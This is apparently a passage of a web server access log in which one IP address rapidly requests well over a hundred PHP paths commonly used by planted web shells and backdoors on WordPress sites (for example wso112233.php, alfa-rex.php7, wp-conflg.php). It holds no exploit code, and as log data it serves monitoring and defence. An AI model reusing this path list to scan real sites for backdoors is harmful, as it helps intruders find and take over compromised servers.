/wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:24:10 -0500] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:10 -0500] "GET /cord.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:11 -0500] "GET /wp-links.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:11 -0500] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:10 -0500] "GET /wp-includes/Text/xwx1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:24:11 -0500] "GET /xleet.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:24:11 -0500] "GET /.well-known/gecko-litespeed.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:12 -0500] "GET /wp-content/plugins/xc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:12 -0500] "GET /alfanew.PhP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:12 -0500] "GET /wp-includes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:12 -0500] "GET /.well-known/pki-validation/cux.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:12 -0500] "GET /images/install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:13 -0500] "GET /file5.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:13 -0500] "GET /file2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:24:13 -0500] "GET /.well-known/wso112233.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:13 -0500] "GET /wp-includes/sitemaps/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:14 -0500] "GET /file-manager.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:14 -0500] "GET /ar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:14 -0500] "GET /Sanskrit.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:24:15 -0500] "GET /alfa-rex.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:15 -0500] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:16 -0500] "GET /robots.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:16 -0500] "GET /wp-content/xc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:24:17 -0500] "GET /tx20.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:11 -0500] "GET /wp-content/admin.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:13 -0500] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:14 -0500] "GET /wp-includes/fonts/autoload_classmap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:14 -0500] "GET /lock360.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:15 -0500] "GET /elp.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:15 -0500] "GET /wp-content/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:15 -0500] "GET /wp-includes/sitemaps/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:16 -0500] "GET /m.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:16 -0500] "GET /alfanew.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:16 -0500] "GET /b.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:17 -0500] "GET /function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:24:17 -0500] "GET /wp-content/packed.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:18 -0500] "GET /files.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:18 -0500] "GET /wso112233.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:18 -0500] "GET /cc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:19 -0500] "GET /wp-content/plugins/ubh/goods.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:19 -0500] "GET /asasx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:19 -0500] "GET /natural.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:20 -0500] "GET /wp-includes/wp-class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:20 -0500] "GET /wp-configs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:17 -0500] "GET /wp-includes/pomo/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:17 -0500] "GET /wp-admin/includes/nav.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:18 -0500] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:18 -0500] "GET /moon.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:19 -0500] "GET /wp-conflg/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:19 -0500] "GET /images/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:20 -0500] "GET /test1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:20 -0500] "GET /wp-includes/IXR/test1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:24:21 -0500] "GET /mar.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:22 -0500] "GET /app.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:22 -0500] "GET /NewFile.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:22 -0500] "GET /a.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:23 -0500] "GET /license.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:23 -0500] "GET /ALFA_DATA/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:23 -0500] "GET /wp-admin/css/colors/blue/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:23 -0500] "GET /xxx.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:24:24 -0500] "GET /good.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:25 -0500] "GET /wp-includes/block-supports/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:25 -0500] "GET /wp-includes/shell20211028.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:25 -0500] "GET /wp-content/plugins/wp-sec/ab.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:20 -0500] "GET /geju.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:24:21 -0500] "GET /wp-includes/style-engine/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:24:21 -0500] "GET /woh.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:24:21 -0500] "GET /xc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:21 -0500] "GET /log.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:22 -0500] "GET /inc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:22 -0500] "GET /wp-admin/js/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:23 -0500] "GET /options.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:24 -0500] "GET /wp-admin/network/network.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 194.5.82.85 - - [20/Dec/2025:15:24:24 -0500] "GET /wp-content/wso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:24 -0500] "GET /wp-includes/block-supports/layout.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:24 -0500] "GET /wp-content/plugins/linkpreview/j.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:25 -0500] "GET /ini.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:26 -0500] "GET /.well-known/pki-validation/file.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:26 -0500] "GET /leaf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:26 -0500] "GET /t.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:26 -0500] "GET /wp-content/themes/pridmag/fr.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:27 -0500] "GET /about.php/wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:27 -0500] "GET /wp-admin/x.php?action=768776e296b6f286f26796e2a72607e2972647 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:24:27 -0500] "GET /wp-includes/fonts/admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:24:25 -0500] "GET /wp-includes/customize/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:26 -0500] "GET /wp-content/languages/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:27 -0500] "GET /wp-includes/block-supports/generated-classname.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:28 -0500] "GET /wp-admin/user/xmrlpc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:28 -0500] "GET /10.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:29 -0500] "GET /wp-includes/js/tinymce/skins/alfa-rex.php8 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:29 -0500] "GET /about.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:30 -0500] "GET /wp-content/updates.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:30 -0500] "GET /wp-includes/Text/dashboard.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:24:31 -0500] "GET /akc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:31 -0500] "GET /wp-content/plugins/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:32 -0500] "GET /p.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:32 -0500] "GET /222.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:33 -0500] "GET /xxl.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:33 -0500] "GET /wp2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:24:33 -0500] "GET /sitemap.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:33 -0500] "GET /wp-admin/network/plugins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:34 -0500] "GET /build.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:34 -0500] "GET /wp-includes/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:35 -0500] "GET /wp-content/themes/astra/inc/ki1k.ph HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:27 -0500] "GET /wp-content/content.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:24:28 -0500] "GET /gm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:28 -0500] "GET /wp-admin/maint/users.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:28 -0500] "GET /fw.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:24:29 -0500] "GET /admin/function.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:24:29 -0500] "GET /wp-content/themes/astra/inc/ki1k.php/js/fm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:24:29 -0500] "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:30 -0500] "GET /tx24.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:24:30 -0500] "GET /wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 